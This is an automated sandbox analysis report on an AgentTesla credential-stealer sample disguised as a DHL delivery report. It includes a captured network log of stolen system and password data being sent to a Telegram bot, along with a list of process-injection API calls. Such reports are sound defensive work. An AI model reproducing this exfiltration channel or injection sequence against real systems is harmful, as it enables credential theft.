2022-05-14 13:11:12 UTC	0	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 32 33 31 39 38 31 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 34 33 36 39 38 32 31 37 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 32 33 31 39 38 31 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 32 38 34 39 39 32 0a 4f 53 46 Data Ascii: -----------------------------8da35bf231981d6Content-Disposition: form-data; name="chat_id"1436982177-----------------------------8da35bf231981d6Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/284992OSF
2022-05-14 13:11:12 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 14 May 2022 13:11:12 GMT Content-Type: application/json Content-Length: 631 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":5078,"from":{"id":5279095555,"is_bot":true,"first_name":"boxxyp","username":"boxxypbot"},"chat":{"id":1436982177,"first_name":"Boxxy","last_name":"P","username":"boxxypp","type":"private"},"date":1652533872,"document":{"file_name":"user-284992 2022-05-14 03-33-27.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIT1mJ_qnCzOjFwD6ifMyNDB4pELbX9AAKMCgAC-U8AAVBDCA9F3VY0SCQE","file_unique_id":"AgADjAoAAvlPAAFQ","file_size":431},"caption":"New PW Recovered!\n\nUser Name: user/284992\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Target ID:	1
Start time:	15:10:50
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe"
Imagebase:	0x1e0000
File size:	550400 bytes
MD5 hash:	163D3BC2C523DC10C959474AA3F69D56
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	2
Start time:	15:10:54
Start date:	14/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Imagebase:	0x930000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10%
Total number of Nodes:	30
Total number of Limit Nodes:	3

Executed Functions

Function 049EEF28 Relevance: 1.8, APIs: 1, Instructions: 261
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 049EF1B8

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 9810249fdc006c843d0400e52dcf3a493313a9cd543921bb1dbc33c1fcd2abb4
Instruction ID: d3f34c6e1852eebaf04629a3703be636f46dffa2fed4aef0c4e986ea08e8e042
Opcode Fuzzy Hash: 9810249fdc006c843d0400e52dcf3a493313a9cd543921bb1dbc33c1fcd2abb4
Instruction Fuzzy Hash: 74A16E71E00259AFDB11CF69C8417EDBBB6FF48304F00856AE818A7395DB74A985CF81

Uniqueness

Uniqueness Score: -1.00%

Function 049EB300 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 049EB370
GetCurrentThread.KERNEL32 ref: 049EB3AD
GetCurrentProcess.KERNEL32 ref: 049EB3EA
GetCurrentThreadId.KERNEL32 ref: 049EB443

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 76c0a6dd7b69b2add3ddf2e9fc58a025c5b0502309057746054c00700149251e
Instruction ID: ce9206b376ecb36a1afb1b7a0bfa720031c4433c8d88822ce127e2068a69bcf6
Opcode Fuzzy Hash: 76c0a6dd7b69b2add3ddf2e9fc58a025c5b0502309057746054c00700149251e
Instruction Fuzzy Hash: 345136B09017898FDB21CFAAD9487AEBBF1EF49314F248469E409B7350D734A945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 049EB310 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 049EB370
GetCurrentThread.KERNEL32 ref: 049EB3AD
GetCurrentProcess.KERNEL32 ref: 049EB3EA
GetCurrentThreadId.KERNEL32 ref: 049EB443

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e705c00e0938dc25ef1bb7d0fb98fa49b083176ff55314d3e88ce8a8795837ad
Instruction ID: 7b622f9c76cab1cfb4c711f7bc130ed7ef5d58fa773a68b66aba9f74bbc11731
Opcode Fuzzy Hash: e705c00e0938dc25ef1bb7d0fb98fa49b083176ff55314d3e88ce8a8795837ad
Instruction Fuzzy Hash: 9D5146B09017898FDB11CFAAD948BAEBBF0EF48314F248459E409B7350D734A844CF66

Uniqueness

Uniqueness Score: -1.00%

Function 049EB5F8 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 049EB5BF

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 18be777ca0cc39b7809b70a0ff0f53a1a45d570ef4f1d875aa56dcf35e24b755
Instruction ID: d9f4442636e06ab6f6053bd057ad0de31e7a0219187667d4f998bbc167dc4ef5
Opcode Fuzzy Hash: 18be777ca0cc39b7809b70a0ff0f53a1a45d570ef4f1d875aa56dcf35e24b755
Instruction Fuzzy Hash: A1319C786413408FE7159F74E848BAA3BA1F7DA311F10416AEA058F3E5EA3A1C47DF50

Uniqueness

Uniqueness Score: -1.00%

Function 049EB530 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 049EB5BF

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bb8224a19a04e80aee101d750f17067126aae956e6676d10f3c4e705cde7bd61
Instruction ID: 503bca069601f659432c8fa2211c57680f8b6c3ca914d8558892cdf4a8bc4cc4
Opcode Fuzzy Hash: bb8224a19a04e80aee101d750f17067126aae956e6676d10f3c4e705cde7bd61
Instruction Fuzzy Hash: C42103B5D00248AFDB10CFA9D484ADEBBF4EB48320F14842AE914A3310D374A945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 049EF5B0 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 049EF63D

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 95b4844cb0445c7e79f49e0eb35fbf9331bd0d15d397ff47951bdf404c3c42e7
Instruction ID: c40701b4ef8ed0cd4088a0d077bbae84fa95fd6d108ee2e6f047ca35686ff3d9
Opcode Fuzzy Hash: 95b4844cb0445c7e79f49e0eb35fbf9331bd0d15d397ff47951bdf404c3c42e7
Instruction Fuzzy Hash: AB21E4B1901359DFCB10CF9AD885BDEBBF4FB48314F10842AE918A3250D778A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 049EB538 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 049EB5BF

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: db8d32e21c0789218680cbf40738a42c2179e0319c9f959a4bd6c5ad50ced4cc
Instruction ID: 4941e6acc21e84347d953e002241736eb765ac1297c6c63845fffdc2c23c9f31
Opcode Fuzzy Hash: db8d32e21c0789218680cbf40738a42c2179e0319c9f959a4bd6c5ad50ced4cc
Instruction Fuzzy Hash: AF21C4B59002489FDB10CF9AD984ADEBBF8EB48324F14841AE955B3350D774A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 049EF358 Relevance: 1.6, APIs: 1, Instructions: 58
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 049EF3CF

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: ba48e340b2434114ffd4b46f39b78dd5bc4c2d1dadd332a24df58b0842caa2b7
Instruction ID: 61063a0d793b5b0160a046e35534e44a24dbf7f1053f61a75aede0a94baa00a0
Opcode Fuzzy Hash: ba48e340b2434114ffd4b46f39b78dd5bc4c2d1dadd332a24df58b0842caa2b7
Instruction Fuzzy Hash: C42106B1D006599FDB10CF9AC8857EEFBF8BB48324F14812AE418B3740D778A9448FA1

Uniqueness

Uniqueness Score: -1.00%

Function 049EF418 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 049EF48E

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 663e200674d5ae2bce7e91e453feb6a3a77eeb8aa41bee9774be86649d6ba8dc
Instruction ID: 3a6f05370459ee7400478052f37a4c27a18245fc55feaf2c7954cd32cd0d85d1
Opcode Fuzzy Hash: 663e200674d5ae2bce7e91e453feb6a3a77eeb8aa41bee9774be86649d6ba8dc
Instruction Fuzzy Hash: 9E21D3B59006499FCB10CF9AC884BDEBBF4FF48324F14842AE958A7250D378A545DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 049EF508 Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 049EF573

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 50434a3dae596329310bbc8a817665fac30c0e8044e1e627669d1f18d7f87bec
Instruction ID: 24202d0991ad2da63cbbe966899c854df545defb023c60a546819944fc0b9091
Opcode Fuzzy Hash: 50434a3dae596329310bbc8a817665fac30c0e8044e1e627669d1f18d7f87bec
Instruction Fuzzy Hash: 3111F5B5900689DFCB10CF9AC884BDEBFF4FB48324F14841AE519A7250D775A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 049EF718 Relevance: 1.5, APIs: 1, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 049EF777

Memory Dump Source

Source File: 00000001.00000002.388933365.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_49e0000_Dhl recent package delivery report needs attention.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 42f1dd72615ac5649fa598981524f365347840cc3768bdb1b7a5a23f460060b7
Instruction ID: b819ca1f84f25f72bd1db3aa504eb3c55f1a329743f044403095105a561a15d2
Opcode Fuzzy Hash: 42f1dd72615ac5649fa598981524f365347840cc3768bdb1b7a5a23f460060b7
Instruction Fuzzy Hash: 351112B58003888FCB10CF9AD484BDEBBF8EB88324F20841AD519B3250C775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 2728, Parent PID: 6256COMMON

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.6%
Total number of Nodes:	125
Total number of Limit Nodes:	13

Executed Functions

Function 0A104BC8 Relevance: 6.1, Strings: 4, Instructions: 1108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 0A104E06
\, xrefs: 0A104DCB
\, xrefs: 0A104C41
\, xrefs: 0A104D11

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID:
String ID: \$\$\$\
API String ID: 0-3238275731
Opcode ID: 41e031b7182f5879db4af1e2f9587fb069508b8d02bc268d806e20013cfcb682
Instruction ID: 0f3863236eec55a9623573bcd9f9b45eeff12410bdbc532dccc9b9062766f5a4
Opcode Fuzzy Hash: 41e031b7182f5879db4af1e2f9587fb069508b8d02bc268d806e20013cfcb682
Instruction Fuzzy Hash: 16928F30A002148FCB14DF78D998BAEB7B6EF88310F1585AAD509DB385DF79AC468F51

Uniqueness

Uniqueness Score: -1.00%

Function 0A102DB0 Relevance: 1.7, APIs: 1, Instructions: 180
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0A102DF1

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8c050ba9438f24882e653dc6e594f72b668055a3170135bd2915e4bf3c6b8ca
Instruction ID: adec1ac10926dfb00f0d921d1b0a3c2ceea2a7e49557dddf1273bdba279011c0
Opcode Fuzzy Hash: c8c050ba9438f24882e653dc6e594f72b668055a3170135bd2915e4bf3c6b8ca
Instruction Fuzzy Hash: D4615B30A102199BCB14DFB4D958BAEB7F2AF84305F118529E502EB394DBB99845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0A101150 Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8462261a3164a8efead6a13e4c58fabdcc15cdad6467b28438556627abcd25fa
Instruction ID: 63b286f6043cb35fb2d068ec5226e0a19bf693706ef5f30ff2a189d9860cda40
Opcode Fuzzy Hash: 8462261a3164a8efead6a13e4c58fabdcc15cdad6467b28438556627abcd25fa
Instruction Fuzzy Hash: DA420430F042449FCB04EBB8D854AAEBBB2EF86314F15816AD506DB392DB75DC49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0A104F40 Relevance: .7, Instructions: 734COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3dc1fda5c0f951aac53b9a1cc0adaee9c840fef66cab5e0324ea0ffff31903
Instruction ID: 2fc9ac56aa4dd2d2011ccc4ee617483fb9c28f66ab87489661379e414e30f70a
Opcode Fuzzy Hash: 2e3dc1fda5c0f951aac53b9a1cc0adaee9c840fef66cab5e0324ea0ffff31903
Instruction Fuzzy Hash: 2E625A30A002148FCB14AFB4D998BADB7B6FF88310F1585A9D40ADB344DF79AD869F51

Uniqueness

Uniqueness Score: -1.00%

Function 0A1030E8 Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e02e9d630dad6e83a08636b034c4a9f5d1fcb319aabe33d3e878bbabc225af
Instruction ID: 1dc61a276ac7c96da6835b79bfe48522b0a207d5883219f05c64299276284ef4
Opcode Fuzzy Hash: 70e02e9d630dad6e83a08636b034c4a9f5d1fcb319aabe33d3e878bbabc225af
Instruction Fuzzy Hash: 3A129D30B002449FCB14DFB8D598AAEBBF2EF88304F15856AE415EB395DB74EC468B51

Uniqueness

Uniqueness Score: -1.00%

Function 008DF3C8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28323d4767dc0ebaa35500acd0db0df713ea3b881fb921e1318cdb78716be04
Instruction ID: 6c83c9b0a5656b8ff8374b5f3b6b8ae16f35e1e0eee08bdf32200da7afe923bd
Opcode Fuzzy Hash: b28323d4767dc0ebaa35500acd0db0df713ea3b881fb921e1318cdb78716be04
Instruction Fuzzy Hash: B7B13B70E002499BDB10CFA9D8857DEBBF2FF88304F14822AD91AE7395DB749845DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008DF3BD Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2df781d44adf9af8c2bf3f5640799c00bf4ef7c86e4871f94a08cfb8cbc7d3e
Instruction ID: 2a7ed27b949c1fb9829a1c988f2fbe7439b6022a0c022032a809aed47f759aa0
Opcode Fuzzy Hash: a2df781d44adf9af8c2bf3f5640799c00bf4ef7c86e4871f94a08cfb8cbc7d3e
Instruction Fuzzy Hash: 2FB15B70E002499FDB10CFA8D8857DEBBB2FF88308F14822AD91AE7355DB749845DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008DF080 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c8908f71334b24757acf1b878007036adf21287dafe2266e7cf0306255a591
Instruction ID: 7f563a133b4fe10433000091af282eff47e7fa5ebe19f31f9004e8979933b90d
Opcode Fuzzy Hash: 81c8908f71334b24757acf1b878007036adf21287dafe2266e7cf0306255a591
Instruction Fuzzy Hash: 43912970E00209DBDF14CFA9D98179DBBF2FB88308F14822AE50AE7355DB749846DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0A10D4F8 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0A10D558
GetCurrentThread.KERNEL32 ref: 0A10D595
GetCurrentProcess.KERNEL32 ref: 0A10D5D2
GetCurrentThreadId.KERNEL32 ref: 0A10D62B

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c42ebb44b7847164055d0385d4bc30707dcf763b801a3e78f2b640d817d8a0d1
Instruction ID: dc717892340d1613ba2d4aeb26a1235542c3031d27ed0f451b96ae756d78d3e6
Opcode Fuzzy Hash: c42ebb44b7847164055d0385d4bc30707dcf763b801a3e78f2b640d817d8a0d1
Instruction Fuzzy Hash: F25144B09007888FDB14CFA9E548B9EBBF0EF48318F248459E419B7390D779A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0A1083A0 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a100000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d883cf9d6c0b504a1c6fdfdf70243492a8f31de5f68b2848c4ec3d31054a515
Instruction ID: 07153afd5ee53e57f044d2bd6224dfd0262b2c3a3fbe975d15288204fc75d7cc
Opcode Fuzzy Hash: 1d883cf9d6c0b504a1c6fdfdf70243492a8f31de5f68b2848c4ec3d31054a515
Instruction Fuzzy Hash: E5412571E183998FCB14CFB9C4046AEBBF1EF89314F05816AD505E7291DBB89885CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 008DC8E4 Relevance: 1.6, APIs: 1, Instructions: 91
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 008DC9BA

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 39051bd81f4f7624f9b1c392874562e6a9992d568fedef1587497b60d42c86a5
Instruction ID: 86a6008d06e2bc991fcad87bbca52ff7c77709bbd90668c5bef2994434e00d7e
Opcode Fuzzy Hash: 39051bd81f4f7624f9b1c392874562e6a9992d568fedef1587497b60d42c86a5
Instruction Fuzzy Hash: 153133B0D1029A9FCB14CFA8C89579EBFB1FF08314F14822AE856E7380D7749846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008D9C5C Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 008DC9BA

Memory Dump Source

Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1abd03dea282c69f6524a27c413e6374656291904343be018ca9356df8c4e8c0
Instruction ID: 67aeadfe7376f1b49b17cee8b865b19af85d2f3f120a4d5115ecaadf4907dd87
Opcode Fuzzy Hash: 1abd03dea282c69f6524a27c413e6374656291904343be018ca9356df8c4e8c0
Instruction Fuzzy Hash: 7D3102B0D1025AAFDB14CFA9C89579EBBB1FF48314F14822AE816E7380DB749845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0A103EC0 Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0A103F79

Memory Dump Source

Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false

Joe Sandbox IDA Plugin

